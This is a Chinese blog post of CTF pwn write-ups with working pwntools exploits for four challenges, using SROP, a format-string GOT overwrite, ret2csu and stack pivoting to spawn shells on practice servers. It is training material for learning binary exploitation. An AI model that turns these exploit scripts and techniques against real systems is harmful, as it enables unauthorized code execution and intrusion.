PWN练习---Stack_2

简介: PWN练习---Stack_2

srop

题源:[NewStarCTF 2023 公开赛道]srop

考点:SROP + 栈迁移

源码

首先从bss段利用 syscall 调用 write 读出数据信息,然后调用 syscall-read向栈中rbp-0x30 位置读入数据,最多0x300字节。

[Tips:观察到调用 sys_read和sys_weite 时候,eax都是0,并且 rcx 被赋值为 size 部分。则猜测 rdi被当作 rax 使用,rsi,rdx,rcx 分别赋值三个参数。]


分析

  1. 利用栈溢出进行栈迁移将rbp寄存器转到bss段高地址。
  2. 然后在返回地址处填写程序调用 syscall-read 处起始地址,用于向rbp-0x30地址写入shell,实现向bss地址读入数据(二次输入)。
  3. 接着填充0x30垃圾数据覆盖到 rbp,rip地址利用syscall触发 sigreturn 。
  4. 最后布置栈中寄存器的值,调用execve(/bin/sh,0,0)执行shell。


exp

from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn_1')
#io = remote('node5.buuoj.cn',27296)
io = process('./pwn_1')
pop_rdi = 0x401203

lea = 0x401171  # lea rax,[rbp-0x30]  != leave 

bss = 0x404050  + 0x300
io.recvuntil(b'welcome to srop!\n')
syscall = elf.symbols['syscall']

frame = SigreturnFrame()  # execve(/bin/sh,0,0)
frame.rdi = 59   # "rax" = 0x3b
frame.rsi = bss - 0x30  # /bin/sh 填写地址为 rbp-0x30。====> "rdi"
frame.rdx = 0             #  "rsi"
frame.rcx = 0              #  "rdx"
frame.rsp = bss + 0x38  
frame.rip = syscall    

io.send(b'a'*0x30 + p64(bss) + p64(lea))
io.send(b'/bin/sh\x00' + b'a'*0x30 + flat(pop_rdi,0xf,syscall) + flat(frame))
           # shell + buf +     srop + syscall + framme     [rdi===>"rax"]
io.interactive()

putsorsys

题源:[NewStarCTF 2023 公开赛道]puts or system?

考点:64位fmt + got篡改

源码

存在格式化字符串漏洞,并且注意到已经存在“/bin/sh”参数。


分析

程序存在多次格式化字符串漏洞。

Step1:格式化字符串漏洞(%s + puts_got)泄露puts函数真实地址,利用附件 libc.so 获取 system 函数地址。

Step2:注意到每一次输入后,调用puts函数,并且把 /bin/sh 作为参数,可以再次利用格式化字符串漏洞 将 puts_got 篡改为 system 地址,构造 system(/bin/sh) 获取shell。


exp

#kali打不通...,Xubuntu会断(半通)
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
 
#p =process('./putsorsys')
p =remote('node5.buuoj.cn',26885)
elf =ELF('./putsorsys')
libc =ELF('./libc.so.6')
 
got_addr =elf.got['puts']
p.sendlineafter(b'(0/1)\n',b'1')
payload =b'%9$sAAAA' +p64(got_addr)   #AAAA对齐(4+4=8) %s泄露指针指向内存的数据
p.sendafter(b"What's it\n",payload)
p.recvuntil(b'There is my gift:\n')
 
puts_addr = u64(p.recvuntil(b'\x7f')[:6].ljust(8, b'\x00'))
print(hex(puts_addr))
 
libc_base = puts_addr - libc.sym['puts']
sys_addr = libc_base + libc.sym['system']
bin_sh = libc_base +  next(libc.search(b"/bin/sh\x00"))
 
p.sendlineafter(b'(0/1)\n',b'1')
 
payload =fmtstr_payload(8, {got_addr:sys_addr})
p.sendlineafter(b"What's it\n",payload)
p.interactive()

ret2csu_1

题源:[NewStarCTF 2022 公开赛道]ret2csu1

考点:ret2csu-basic + execve函数使用

源码



分析

首先程序存在栈溢出,可以覆盖返回地址。并且给出了后门函数,但是直接转到后门函数并没有任何作用,注意到 0x400648 地址调用了 syscall-execve ,可以利用 __libc_csu_init 函数中的gadget进行劫持。


先布置gadget并分配好寄存器参数,然后劫持函数执行 execve(/bin/cat,/bin/cat/flag,0) 即可获取flag。查看__libc_csu_init 的汇编代码得到结论:

r13d,r14,r15寄存器的值分别可以被复制到x86-64位程序前三个寄存器 edi,rsi,rdx中,可以构造 execve函数的三个参数。


(虽然r13只有后八字节复制给了edi,但是经过调试发现rdi前八个字节是0,因此等同于 mov r13,rdi。)


同时,注意到存在/bin/cat,/flag字符串,因此构造execve(/bin/cat,/bin/cat/flag,0)


execve(const char *filename, char *const argv[], char *const envp[]);


filename:包含准备载入当前进程空间的新程序的路径名。既可以是绝对路径,又可以是相对路径。

argv[ ] :指定了传给新进程的命令行参数,该数组对应于c语言main函数的argv参数数组,格式也相同,argv[0]对应命令名,通常情况下该值与filename中的basename(就是绝对路径的最后一个)相同。

envp[ ]:最后一个参数envp指定了新程序的环境列表。参数envp对应于新程序的environ数组。


图中第二部分call指令:将r12+rbx*8 的结果作为地址来调用。

布置寄存器参数:

rbx:由于第二部分mov,call下面存在add,cmp指令。如果rbx+1 != rbp,那么将会跳转,因此将rbx赋值为0。rbp:赋值为1,即可避免跳转。

r12:需要填充 数据为0x400648 的地址 来进行调用execve。发现:


.data:0000000000601068 48 06 40 00 00 00 00 00 gift3 dq 400648h

.data:0000000000601068 _data ends

.data:0000000000601068


因此赋值为0x601068

【Tip:不能直接填0x400648,类似于二级跳转。例如调用read函数时也需要填充read的got地址而不是plt地址】

r12,r13,r14分别赋值 0x4007BB,0x601050,0


exp

from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
elf = ELF('./ret2csu-1')
offset = 0x28
io = remote('node5.buuoj.cn',27959)
#io = process('./ret2csu-1')
pop_6 = 0x40072a
mov_3 = 0x400710

p = b'a'*offset + p64(pop_6) + p64(0)+p64(1) + p64(0x601068) 
p += p64(0x4007BB) +p64(0x601050) + p64(0) + p64(mov_3)
    # execve(/bin/cat,/bin/cat/flag,0)
io.sendafter(b'!\n',p)
io.interactive()

traveler

题源:[VNCTF2023]Traveler

考点:栈迁移(+抬栈)

坑点:bss段需要足够高地址才行。

源码


分析

思路1:第一次栈溢出调用向栈中填充数据的read功能代码,fake_rbp填充为bss段地址,然后第二次利用已有的system构造shell,new-fake_rbp填充为bss-0x28地址,再加上leave使得程序回调执行shell。(注意leave后rsp地址为rbp+8)

思路2:system函数的参数填充在第二次输入的bss段,亦可触发。

exp

from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
io = remote('node5.buuoj.cn',29868)
#io = process('./traveler')
offset = 0x20
elf = ELF('./traveler')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

main = elf.sym['main']

leave = 0x401253
bss_1 = 0x404800 #本地打通的bss地址
bss_2 = 0x404d00 # 远程打通bss地址
pop_rdi = 0x4012c3
ret = 0x40101a
read = 0x401216
p1 = b'a'*offset + p64(bss_2) + p64(read)
io.sendafter(b'u?\n',p1)
io.sendafter(b'life?\n',b'a')

system = elf.sym['system']
bin = bss_2 - 0x8
p2 =  p64(pop_rdi) + p64(bin) + p64(system)  + b'/bin/sh\x00' + p64(bss_2-0x28) + p64(leave)  #思路1
io.send(p2)
io.sendafter(b'life?\n',b'a') #思路2/bin/sh\x00

io.interactive()
目录
相关文章
|
6月前
|
网络协议 安全 Ubuntu
PWN练习---Stack_1
PWN练习---Stack_1
111 3
|
6月前
|
安全 算法 Shell
PWN练习---Heap_1
PWN练习---Heap_1
74 7
|
6月前
|
安全 Shell
ISCC2024--pwn
ISCC2024--pwn
44 0
|
7月前
|
数据安全/隐私保护
BUUCTF---misc--snake
BUUCTF---misc--snake
BUUCTF---misc---梅花香之苦寒来
BUUCTF---misc---梅花香之苦寒来
攻防世界---misc---low
攻防世界---misc---low
|
7月前
|
网络协议
攻防世界---misc---easycap
攻防世界---misc---easycap
|
前端开发 rax Shell
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)(上)
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)
826 0
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)(上)
|
NoSQL 编译器 C语言
[PWN][基础篇]什么是Canary保护
[PWN][基础篇]什么是Canary保护
615 0
[PWN][基础篇]什么是Canary保护
[PWN][高级篇]ROP-ret2libc基础知识
[PWN][高级篇]ROP-ret2libc基础知识
488 0
[PWN][高级篇]ROP-ret2libc基础知识